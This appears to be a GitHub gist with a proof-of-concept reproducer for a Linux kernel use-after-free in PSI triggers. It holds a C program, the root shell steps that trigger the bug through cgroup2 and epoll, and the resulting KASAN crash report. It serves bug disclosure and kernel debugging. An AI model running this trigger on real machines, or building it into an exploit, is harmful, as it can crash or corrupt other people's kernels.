Created
January 13, 2023 00:03
-
-
Save kamatam9/096a79cf59d8ed8785c4267e917b8675 to your computer and use it in GitHub Desktop.
PSI use-after-free
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[ec2-user@ip-10-0-26-185 ~]$ | |
[ec2-user@ip-10-0-26-185 ~]$ cat psi-uaf.c | |
#include <fcntl.h> | |
#include <sys/epoll.h> | |
#include <unistd.h> | |
int main(void) | |
{ | |
const char trigger_str[] = "some 100000 1000000"; | |
int fd, epfd; | |
struct epoll_event event; | |
struct epoll_event events[1]; | |
fd = open("/cgroup2/test/cpu.pressure", O_RDWR); | |
write(fd, trigger_str, sizeof(trigger_str)); | |
epfd = epoll_create(1); | |
event.events = EPOLLPRI | EPOLLET; | |
event.data.fd = fd; | |
epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event); | |
epoll_wait(epfd, events, 1, -1); | |
pause(); | |
return 0; | |
} | |
[ec2-user@ip-10-0-26-185 ~]$ gcc psi-uaf.c | |
[ec2-user@ip-10-0-26-185 ~]$ | |
[ec2-user@ip-10-0-26-185 ~]$ sudo mount -t cgroup2 none /cgroup2/ | |
[ec2-user@ip-10-0-26-185 ~]$ sudo mkdir /cgroup2/test | |
[ec2-user@ip-10-0-26-185 ~]$ sudo ./a.out & | |
[1] 2384 | |
[ec2-user@ip-10-0-26-185 ~]$ sudo rmdir /cgroup2/test | |
[ec2-user@ip-10-0-26-185 ~]$ sudo killall a.out | |
[ec2-user@ip-10-0-26-185 ~]$ | |
[1]+ Terminated sudo ./a.out | |
[ec2-user@ip-10-0-26-185 ~]$ dmesg | |
... | |
[ 102.806193] ================================================================== | |
[ 102.813207] BUG: KASAN: use-after-free in _raw_spin_lock_irqsave+0x76/0x130 | |
[ 102.816011] Write of size 4 at addr ffff888003324928 by task a.out/2385 | |
[ 102.834487] CPU: 0 PID: 2385 Comm: a.out Not tainted 6.2.0-rc3 #28 | |
[ 102.836744] Hardware name: Amazon EC2 t3.micro/, BIOS 1.0 10/16/2017 | |
[ 102.839159] Call Trace: | |
[ 102.840179] <TASK> | |
[ 102.841141] dump_stack_lvl+0x8f/0xc0 | |
[ 102.842611] print_report+0x16c/0x4e0 | |
[ 102.844140] ? _raw_spin_lock_irqsave+0x76/0x130 | |
[ 102.845863] kasan_report+0xc3/0xf0 | |
[ 102.847312] ? mt_destroy_walk+0xa0a/0xa90 | |
[ 102.848856] ? _raw_spin_lock_irqsave+0x76/0x130 | |
[ 102.850560] kasan_check_range+0x2d2/0x310 | |
[ 102.852214] _raw_spin_lock_irqsave+0x76/0x130 | |
[ 102.854020] remove_wait_queue+0x25/0x130 | |
[ 102.855540] ep_free+0x12d/0x220 | |
[ 102.856906] ep_eventpoll_release+0x3c/0x40 | |
[ 102.858463] __fput+0x32b/0x700 | |
[ 102.862403] task_work_run+0x1db/0x230 | |
[ 102.865666] do_exit+0x750/0x2090 | |
[ 102.868718] do_group_exit+0x221/0x230 | |
[ 102.871898] get_signal+0x1768/0x1810 | |
[ 102.874963] ? __schedule+0xf60/0x16e0 | |
[ 102.878203] arch_do_signal_or_restart+0x2e/0x4d0 | |
[ 102.881651] exit_to_user_mode_prepare+0x94/0x100 | |
[ 102.885056] syscall_exit_to_user_mode+0x20/0x40 | |
[ 102.888419] do_syscall_64+0x52/0x90 | |
[ 102.891412] entry_SYSCALL_64_after_hwframe+0x63/0xcd | |
[ 102.894952] RIP: 0033:0x7f20be0bfb91 | |
[ 102.898040] Code: Unable to access opcode bytes at 0x7f20be0bfb67. | |
[ 102.903104] RSP: 002b:00007ffe8f20f418 EFLAGS: 00000246 ORIG_RAX: 0000000000000022 | |
[ 102.909299] RAX: fffffffffffffdfe RBX: 0000000000000000 RCX: 00007f20be0bfb91 | |
[ 102.913767] RDX: 0000000000000001 RSI: 00007ffe8f20f428 RDI: 0000000000000004 | |
[ 102.917980] RBP: 00007ffe8f20f460 R08: 0000000000400780 R09: 00007f20be40f240 | |
[ 102.922173] R10: 00000000000003df R11: 0000000000000246 R12: 00000000004005a0 | |
[ 102.927445] R13: 00007ffe8f20f540 R14: 0000000000000000 R15: 0000000000000000 | |
[ 102.931674] </TASK> | |
[ 102.936679] Allocated by task 2385: | |
[ 102.939681] kasan_set_track+0x3d/0x60 | |
[ 102.942802] __kasan_kmalloc+0x85/0x90 | |
[ 102.945878] psi_trigger_create+0x155/0x850 | |
[ 102.949189] pressure_write+0x200/0x510 | |
[ 102.954214] cgroup_file_write+0x1de/0x3e0 | |
[ 102.957528] kernfs_fop_write_iter+0x27d/0x380 | |
[ 102.960842] vfs_write+0x7d7/0xaa0 | |
[ 102.963878] ksys_write+0xd7/0x1a0 | |
[ 102.967736] do_syscall_64+0x43/0x90 | |
[ 102.970956] entry_SYSCALL_64_after_hwframe+0x63/0xcd | |
[ 102.976903] Freed by task 2391: | |
[ 102.979839] kasan_set_track+0x3d/0x60 | |
[ 102.982905] kasan_save_free_info+0x27/0x40 | |
[ 102.986143] ____kasan_slab_free+0x11d/0x170 | |
[ 102.989412] slab_free_freelist_hook+0x87/0x150 | |
[ 102.992823] __kmem_cache_free+0xcb/0x180 | |
[ 102.996070] psi_trigger_destroy+0x458/0x550 | |
[ 102.999359] cgroup_file_release+0x96/0x110 | |
[ 103.002633] kernfs_drain_open_files+0x238/0x420 | |
[ 103.005985] kernfs_drain+0x191/0x2a0 | |
[ 103.009015] __kernfs_remove+0x3a6/0x600 | |
[ 103.012157] kernfs_remove_by_name_ns+0xc2/0x120 | |
[ 103.017230] cgroup_addrm_files+0x90f/0xcf0 | |
[ 103.020743] cgroup_destroy_locked+0x48a/0x730 | |
[ 103.024209] cgroup_rmdir+0x2b/0x130 | |
[ 103.028249] kernfs_iop_rmdir+0x17a/0x230 | |
[ 103.032415] vfs_rmdir+0x196/0x410 | |
[ 103.035508] do_rmdir+0x1c7/0x3f0 | |
[ 103.038586] __x64_sys_rmdir+0x45/0x50 | |
[ 103.041748] do_syscall_64+0x43/0x90 | |
[ 103.044859] entry_SYSCALL_64_after_hwframe+0x63/0xcd | |
[ 103.050836] The buggy address belongs to the object at ffff888003324900 | |
which belongs to the cache kmalloc-128 of size 128 | |
[ 103.058548] The buggy address is located 40 bytes inside of | |
128-byte region [ffff888003324900, ffff888003324980) | |
[ 103.068277] The buggy address belongs to the physical page: | |
[ 103.071930] page:00000000b4928b2a refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x3324 | |
[ 103.078482] flags: 0x1fffff80000200(slab|node=0|zone=1|lastcpupid=0x1fffff) | |
[ 103.082682] raw: 001fffff80000200 ffff8880010418c0 ffffea0000063f00 dead000000000004 | |
[ 103.088748] raw: 0000000000000000 0000000080100010 00000001ffffffff 0000000000000000 | |
[ 103.094786] page dumped because: kasan: bad access detected | |
[ 103.100769] Memory state around the buggy address: | |
[ 103.104191] ffff888003324800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb | |
[ 103.110891] ffff888003324880: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc | |
[ 103.116871] >ffff888003324900: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb | |
[ 103.122768] ^ | |
[ 103.126145] ffff888003324980: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc | |
[ 103.132261] ffff888003324a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb | |
[ 103.138220] ================================================================== | |
[ 103.144469] Disabling lock debugging due to kernel taint |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment